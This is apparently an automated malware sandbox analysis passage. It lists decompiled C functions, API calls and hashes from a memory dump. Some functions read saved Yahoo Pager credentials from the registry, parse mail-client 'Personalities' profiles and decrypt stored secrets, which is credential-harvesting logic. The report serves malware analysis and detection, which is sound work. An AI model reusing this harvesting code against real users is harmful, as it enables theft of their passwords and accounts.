                                                                                              				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                                                                              				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                              				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                              			}









                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403AB2
                                                                                              • memset.MSVCRT ref: 00403ACB
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                                                              • strlen.MSVCRT ref: 00403B13
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1786725549-0
                                                                                              • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                              • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                                                              • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                              • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040AC8A(void* __eax, void* __ebx) {
                                                                                              				char _v264;
                                                                                              				char _v524;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				long _t13;
                                                                                              				void* _t18;
                                                                                              				int _t19;
                                                                                              				long _t20;
                                                                                              				void* _t27;
                                                                                              				void* _t31;
                                                                                              
                                                                                              				_t27 = __ebx;
                                                                                              				_t31 = __eax;
                                                                                              				_t13 = GetTempPathA(0x104,  &_v524);
                                                                                              				_t32 = _t13;
                                                                                              				if(_t13 == 0) {
                                                                                              					GetWindowsDirectoryA( &_v524, 0x104);
                                                                                              				}
                                                                                              				_v264 = 0;
                                                                                              				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
                                                                                              				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
                                                                                              				if(_t18 != 0) {
                                                                                              					_t19 = OpenClipboard( *(_t31 + 0x108));
                                                                                              					_t34 = _t19;
                                                                                              					if(_t19 == 0) {
                                                                                              						_t20 = GetLastError();
                                                                                              					} else {
                                                                                              						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
                                                                                              					}
                                                                                              					if(_t20 != 0) {
                                                                                              						E00405F41(_t20,  *(_t31 + 0x108));
                                                                                              					}
                                                                                              					return DeleteFileA( &_v264);
                                                                                              				}
                                                                                              				return _t18;
                                                                                              			}














                                                                                              APIs
                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                                                              • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                                                              • OpenClipboard.USER32(?), ref: 0040ACF8
                                                                                              • GetLastError.KERNEL32 ref: 0040AD11
                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2014771361-0
                                                                                              • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                              • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                                                              • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                                              • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				char* _t34;
                                                                                              				signed int _t35;
                                                                                              				void* _t36;
                                                                                              				void* _t37;
                                                                                              
                                                                                              				_t34 = __edi;
                                                                                              				_v260 = 0;
                                                                                              				memset( &_v259, 0, 0xfe);
                                                                                              				_t37 = _t36 + 0xc;
                                                                                              				 *__edi = 0;
                                                                                              				_t35 = 0;
                                                                                              				do {
                                                                                              					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                              					sprintf( &_v260, "%2.2X");
                                                                                              					_t37 = _t37 + 0xc;
                                                                                              					if(_t35 > 0) {
                                                                                              						strcat(_t34, " ");
                                                                                              					}
                                                                                              					if(_a8 > 0) {
                                                                                              						asm("cdq");
                                                                                              						if(_t35 % _a8 == 0) {
                                                                                              							strcat(_t34, "  ");
                                                                                              						}
                                                                                              					}
                                                                                              					strcat(_t34,  &_v260);
                                                                                              					_t35 = _t35 + 1;
                                                                                              				} while (_t35 < 0x80);
                                                                                              				return _t34;
                                                                                              			}










                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcat$memsetsprintf
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 582077193-791839006
                                                                                              • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                              • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                                                              • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                              • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 77%
                                                                                              			E0040FEED(intOrPtr* __edi) {
                                                                                              				void* __esi;
                                                                                              				signed int _t9;
                                                                                              				intOrPtr* _t16;
                                                                                              				intOrPtr _t18;
                                                                                              				intOrPtr _t19;
                                                                                              				intOrPtr _t20;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t22;
                                                                                              
                                                                                              				_t16 = __edi;
                                                                                              				_t9 =  *(__edi + 0x1c);
                                                                                              				 *__edi = 0x414288;
                                                                                              				if(_t9 != 0) {
                                                                                              					_push(_t9);
                                                                                              					L004115D6();
                                                                                              					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
                                                                                              				}
                                                                                              				_t18 =  *((intOrPtr*)(_t16 + 0x460));
                                                                                              				if(_t18 != 0) {
                                                                                              					_t9 = E00406B5B(_t18);
                                                                                              					_push(_t18);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
                                                                                              				if(_t19 != 0) {
                                                                                              					_t9 = E00406B5B(_t19);
                                                                                              					_push(_t19);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t20 =  *((intOrPtr*)(_t16 + 0x458));
                                                                                              				if(_t20 != 0) {
                                                                                              					_t9 = E00406B5B(_t20);
                                                                                              					_push(_t20);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t21 =  *((intOrPtr*)(_t16 + 0x454));
                                                                                              				if(_t21 != 0) {
                                                                                              					_t9 = E00406A4E(_t21);
                                                                                              					_push(_t21);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				_t22 =  *((intOrPtr*)(_t16 + 0x450));
                                                                                              				if(_t22 != 0) {
                                                                                              					_t9 = E00406A4E(_t22);
                                                                                              					_push(_t22);
                                                                                              					L004115D6();
                                                                                              				}
                                                                                              				return _t9;
                                                                                              			}












                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                              • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                                                              • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                              • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 44%
                                                                                              			E0040173B(void* __ebx) {
                                                                                              				struct tagRECT _v20;
                                                                                              				struct tagPAINTSTRUCT _v84;
                                                                                              
                                                                                              				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                              				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                              				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                              				asm("movsd");
                                                                                              				asm("movsd");
                                                                                              				asm("movsd");
                                                                                              				asm("movsd");
                                                                                              				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                              				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                              			}






                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                              • String ID:
                                                                                              • API String ID: 19018683-0
                                                                                              • Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                              • Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
                                                                                              • Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                              • Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
                                                                                              				signed int _v8;
                                                                                              				char _v16;
                                                                                              				char _v24;
                                                                                              				char _v116;
                                                                                              				void _v1156;
                                                                                              				char _v1164;
                                                                                              				void _v1171;
                                                                                              				char _v1172;
                                                                                              				char _v2188;
                                                                                              				void _v2195;
                                                                                              				void _v2196;
                                                                                              				void _v3251;
                                                                                              				void _v3252;
                                                                                              				char _v4020;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t96;
                                                                                              				char _t105;
                                                                                              				intOrPtr _t112;
                                                                                              				void* _t115;
                                                                                              				signed int _t116;
                                                                                              				int _t121;
                                                                                              				signed int* _t122;
                                                                                              				void* _t124;
                                                                                              				void* _t125;
                                                                                              				signed int _t128;
                                                                                              				signed int* _t129;
                                                                                              				void* _t132;
                                                                                              
                                                                                              				_t116 = __edx;
                                                                                              				_t105 = 0;
                                                                                              				_v2196 = 0;
                                                                                              				memset( &_v2195, 0, 0x3ff);
                                                                                              				_v3252 = 0;
                                                                                              				memset( &_v3251, 0, 0x41e);
                                                                                              				_v1172 = 0;
                                                                                              				memset( &_v1171, 0, 0x41e);
                                                                                              				_a8 = E00410E8A(_a8,  &_v2196);
                                                                                              				_t121 = strlen(_a4);
                                                                                              				if(_a8 > 8) {
                                                                                              					_t137 = _t121;
                                                                                              					if(_t121 > 0) {
                                                                                              						memcpy( &_v3252, _a4, _t121);
                                                                                              						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
                                                                                              						E0040BC49( &_v116);
                                                                                              						_t19 = _t121 + 8; // 0x8
                                                                                              						E0040BC6D(_t19,  &_v116,  &_v3252);
                                                                                              						_t127 =  &_v116;
                                                                                              						E0040BD0B(_t121,  &_v116,  &_v1172);
                                                                                              						_t23 = _t121 + 8; // 0x8
                                                                                              						memcpy( &_v1156,  &_v3252, _t23);
                                                                                              						E0040BC49( &_v116);
                                                                                              						_t27 = _t121 + 0x18; // 0x18
                                                                                              						E0040BC6D(_t27, _t127,  &_v1172);
                                                                                              						E0040BD0B(_t121, _t127,  &_v24);
                                                                                              						E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
                                                                                              						_t122 = _a12;
                                                                                              						E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
                                                                                              						_t112 = _a8;
                                                                                              						_t128 = 0;
                                                                                              						if(_t112 >= 0x18) {
                                                                                              							_t37 = _t112 - 0x18; // -16
                                                                                              							asm("cdq");
                                                                                              							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
                                                                                              						}
                                                                                              						if(_t128 > _t105) {
                                                                                              							_a4 =  &_v2188;
                                                                                              							_t125 = _t122 + 8;
                                                                                              							_v8 = _t128;
                                                                                              							do {
                                                                                              								E004053D6(_a4, _t112, _t125,  &_v4020);
                                                                                              								_a4 = _a4 + 8;
                                                                                              								_t125 = _t125 + 8;
                                                                                              								_t45 =  &_v8;
                                                                                              								 *_t45 = _v8 - 1;
                                                                                              								_pop(_t112);
                                                                                              							} while ( *_t45 != 0);
                                                                                              							_t112 = _a8;
                                                                                              						}
                                                                                              						_t96 = 8 + _t128 * 8;
                                                                                              						_t50 = _t96 + 8; // 0x8
                                                                                              						if(_t50 > _t112) {
                                                                                              							_t51 = _t112 - 8; // 0x0
                                                                                              							_t96 = _t51;
                                                                                              						}
                                                                                              						if(_t96 > _t105) {
                                                                                              							_t129 = _a12;
                                                                                              							_t124 =  &_v2188 - _t129;
                                                                                              							_t115 = _t96;
                                                                                              							do {
                                                                                              								 *_t129 =  *_t129 ^  *(_t124 + _t129);
                                                                                              								_t129 =  &(_t129[0]);
                                                                                              								_t115 = _t115 - 1;
                                                                                              							} while (_t115 != 0);
                                                                                              						}
                                                                                              						 *((char*)(_t96 + _a12)) = _t105;
                                                                                              						 *_a16 = 1;
                                                                                              						_t105 = 1;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t105;
                                                                                              			}
































                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00411387
                                                                                              • memset.MSVCRT ref: 004113A0
                                                                                              • memset.MSVCRT ref: 004113B4
                                                                                                • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                              • strlen.MSVCRT ref: 004113D0
                                                                                              • memcpy.MSVCRT ref: 004113F5
                                                                                              • memcpy.MSVCRT ref: 0041140B
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                                • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                              • memcpy.MSVCRT ref: 0041144B
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                                • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                                • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen
                                                                                              • String ID:
                                                                                              • API String ID: 2142929671-0
                                                                                              • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                              • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                                                              • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                              • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 36%
                                                                                              			E004078FF(signed short __ebx) {
                                                                                              				signed int _t17;
                                                                                              				void* _t18;
                                                                                              				intOrPtr _t23;
                                                                                              				void* _t31;
                                                                                              				signed short _t39;
                                                                                              				signed int _t40;
                                                                                              				void* _t51;
                                                                                              				int _t56;
                                                                                              				void* _t57;
                                                                                              				int _t67;
                                                                                              
                                                                                              				_t39 = __ebx;
                                                                                              				if( *0x417540 == 0) {
                                                                                              					E0040787D();
                                                                                              				}
                                                                                              				_t40 =  *0x417538;
                                                                                              				_t17 = 0;
                                                                                              				if(_t40 <= 0) {
                                                                                              					L5:
                                                                                              					_t51 = 0;
                                                                                              				} else {
                                                                                              					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
                                                                                              						_t17 = _t17 + 1;
                                                                                              						if(_t17 < _t40) {
                                                                                              							continue;
                                                                                              						} else {
                                                                                              							goto L5;
                                                                                              						}
                                                                                              						goto L6;
                                                                                              					}
                                                                                              					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
                                                                                              				}
                                                                                              				L6:
                                                                                              				if(_t51 != 0) {
                                                                                              					L22:
                                                                                              					_t18 = _t51;
                                                                                              				} else {
                                                                                              					if((_t39 & 0x00010000) == 0) {
                                                                                              						if( *0x4171b8 == 0) {
                                                                                              							_push( *0x417548 - 1);
                                                                                              							_push( *0x41752c);
                                                                                              							_push(_t39);
                                                                                              							_push(E00407A55());
                                                                                              							goto L16;
                                                                                              						} else {
                                                                                              							strcpy(0x4172c0, "strings");
                                                                                              							_t31 = E00407D89(_t39,  *0x41752c);
                                                                                              							_t57 = _t57 + 0x10;
                                                                                              							if(_t31 == 0) {
                                                                                              								L14:
                                                                                              								_push( *0x417548 - 1);
                                                                                              								_push( *0x41752c);
                                                                                              								_push(_t39);
                                                                                              								goto L9;
                                                                                              							} else {
                                                                                              								_t56 = strlen( *0x41752c);
                                                                                              								if(_t56 == 0) {
                                                                                              									goto L14;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_push( *0x417548 - 1);
                                                                                              						_push( *0x41752c);
                                                                                              						_push(_t39 & 0x0000ffff);
                                                                                              						L9:
                                                                                              						_push( *0x416b94);
                                                                                              						L16:
                                                                                              						_t56 = LoadStringA();
                                                                                              						_t67 = _t56;
                                                                                              					}
                                                                                              					if(_t67 <= 0) {
                                                                                              						L21:
                                                                                              						_t18 = 0x412466;
                                                                                              					} else {
                                                                                              						_t23 =  *0x41753c;
                                                                                              						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
                                                                                              							goto L21;
                                                                                              						} else {
                                                                                              							_t51 = _t23 +  *0x417528;
                                                                                              							_t10 = _t56 + 1; // 0x1
                                                                                              							memcpy(_t51,  *0x41752c, _t10);
                                                                                              							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
                                                                                              							 *( *0x417530 +  *0x417538 * 4) = _t39;
                                                                                              							 *0x417538 =  *0x417538 + 1;
                                                                                              							 *0x41753c =  *0x41753c + _t56 + 1;
                                                                                              							if(_t51 != 0) {
                                                                                              								goto L22;
                                                                                              							} else {
                                                                                              								goto L21;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t18;
                                                                                              			}














                                                                                              APIs
                                                                                              • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                                                              • strlen.MSVCRT ref: 00407998
                                                                                              • LoadStringA.USER32 ref: 004079C8
                                                                                              • memcpy.MSVCRT ref: 00407A07
                                                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                                                                • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                                              • String ID: strings
                                                                                              • API String ID: 1748916193-3030018805
                                                                                              • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                              • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                                                              • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                              • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040329E(void* __fp0, intOrPtr _a4) {
                                                                                              				int _v8;
                                                                                              				char _v12;
                                                                                              				char _v13;
                                                                                              				char _v14;
                                                                                              				char _v15;
                                                                                              				void _v1035;
                                                                                              				char _v1036;
                                                                                              				char _v1968;
                                                                                              				char _v2900;
                                                                                              				void* __esi;
                                                                                              				void* _t23;
                                                                                              				int _t30;
                                                                                              				char* _t31;
                                                                                              				CHAR* _t49;
                                                                                              				void* _t50;
                                                                                              				void* _t55;
                                                                                              
                                                                                              				_t62 = __fp0;
                                                                                              				_t49 = _a4 + 0xd2a;
                                                                                              				if( *_t49 != 0) {
                                                                                              					_t52 =  &_v1968;
                                                                                              					E004021D8( &_v1968);
                                                                                              					if(E0040314D(_t52, _t49, 0) != 0) {
                                                                                              						E00402407(_t52, __fp0, _a4);
                                                                                              					}
                                                                                              					_v1036 = 0;
                                                                                              					memset( &_v1035, 0, 0x400);
                                                                                              					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
                                                                                              					if(_t30 <= 0) {
                                                                                              						L11:
                                                                                              						return _t30;
                                                                                              					} else {
                                                                                              						_v12 = 0;
                                                                                              						_v13 = 0;
                                                                                              						_v14 = 0;
                                                                                              						_v15 = 0;
                                                                                              						_t50 = 0;
                                                                                              						_t31 =  &_v1036;
                                                                                              						while(1) {
                                                                                              							_t30 = strlen(_t31);
                                                                                              							_v8 = _t30;
                                                                                              							if(_t30 <= 0) {
                                                                                              								goto L11;
                                                                                              							}
                                                                                              							_t54 =  &_v2900;
                                                                                              							E004021D8( &_v2900);
                                                                                              							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
                                                                                              								E00402407(_t54, _t62, _a4);
                                                                                              							}
                                                                                              							_t30 = _v8;
                                                                                              							_t50 = _t50 + _t30 + 1;
                                                                                              							if(_t50 >= 0x3ff) {
                                                                                              								goto L11;
                                                                                              							} else {
                                                                                              								_t31 = _t55 + _t50 - 0x408;
                                                                                              								continue;
                                                                                              							}
                                                                                              						}
                                                                                              						goto L11;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t23;
                                                                                              			}




















                                                                                              APIs
                                                                                                • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                                                              • memset.MSVCRT ref: 004032F2
                                                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 0040330C
                                                                                              • strchr.MSVCRT ref: 00403341
                                                                                                • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                                                              • strlen.MSVCRT ref: 00403383
                                                                                                • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                              • String ID: Personalities
                                                                                              • API String ID: 2103853322-4287407858
                                                                                              • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                              • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                                                              • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                              • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				void* _v8;
                                                                                              				void _v1031;
                                                                                              				char _v1032;
                                                                                              				void* __esi;
                                                                                              				void* _t25;
                                                                                              				int _t26;
                                                                                              
                                                                                              				_t25 = __ecx;
                                                                                              				_t26 = 0;
                                                                                              				_v1032 = 0;
                                                                                              				memset( &_v1031, 0, 0x3ff);
                                                                                              				if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
                                                                                              					if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
                                                                                              						_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
                                                                                              					}
                                                                                              					RegCloseKey(_v8);
                                                                                              				}
                                                                                              				return _t26;
                                                                                              			}










                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00410F9B
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValuememset
                                                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                              • API String ID: 1830152886-1703613266
                                                                                              • Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                              • Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
                                                                                              • Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                              • Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405F41(long __eax, struct HWND__* _a4) {
                                                                                              				char _v1028;
                                                                                              				char _v2052;
                                                                                              				void* __edi;
                                                                                              				long _t15;
                                                                                              
                                                                                              				_t15 = __eax;
                                                                                              				if(__eax == 0) {
                                                                                              					_t15 = GetLastError();
                                                                                              				}
                                                                                              				E00405E46(_t15,  &_v1028);
                                                                                              				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
                                                                                              				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
                                                                                              			}








                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
